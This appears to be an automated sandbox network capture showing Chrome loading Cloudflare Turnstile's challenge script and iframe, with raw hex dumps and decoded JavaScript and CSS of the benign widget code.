                                                                                                                  Data Ascii: op="0",p.style.left="0",p.style.transformOrigin="center center",p.style.overflowX="hidden",p.style.overflowY="auto",p.style.background="rgba(0,0,0,0.4)";var f=document.createElement("div");f.style.display="table-cell",f.style.verticalAlign="middle",f.styl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1649720104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:19 UTC383OUTGET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:19 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:19 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 47532
                                                                                                                  Connection: close
                                                                                                                  accept-ranges: bytes
                                                                                                                  last-modified: Fri, 18 Oct 2024 17:38:58 GMT
                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f0a69cd47a6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:19 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=nu
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 6e 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                  Data Ascii: ray$/.test(n))return nt(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(fu
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                  Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 51 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72
                                                                                                                  Data Ascii: e","false"],e)}function gt(e){return L(["render","execute"],e)}var Qt=300,$t=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOver
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 73 29 7d 76 61 72 20 54 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 70 2c
                                                                                                                  Data Ascii: age,"/").concat(s)}var Tt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),p,
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 70 3d 5b 6e 75 6c 6c 5d 3b 70 2e 70 75 73 68 2e 61 70 70 6c 79 28 70 2c 6c 29 3b 76 61 72 20 66 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 70 29 2c 73 3d 6e 65 77 20 66 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74
                                                                                                                  Data Ascii: ect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return Be()?Ie=Reflect.construct:Ie=function(c,l,h){var p=[null];p.push.apply(p,l);var f=Function.bind.apply(c,p),s=new f;return h&&J(s,h.prototype),s},Ie.apply(null,argument
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 74 69 6f 6e 20 67 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63
                                                                                                                  Data Ascii: tion g(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}func
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 6f 70 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 70 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 66 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 66 2e 73 74 79 6c
                                                                                                                  Data Ascii: op="0",p.style.left="0",p.style.transformOrigin="center center",p.style.overflowX="hidden",p.style.overflowY="auto",p.style.background="rgba(0,0,0,0.4)";var f=document.createElement("div");f.style.display="table-cell",f.style.verticalAlign="middle",f.styl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1649721104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:19 UTC806OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:19 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26772
                                                                                                                  Connection: close
                                                                                                                  referrer-policy: same-origin
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  document-policy: js-profiling
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  2024-10-22 14:08:19 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 30 66 30 61 39 38 65 63 65 39 31 65 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a0f0a98ece91e-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:19 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                                                                  Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                                                                  Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                                                                  Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                                                                  Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
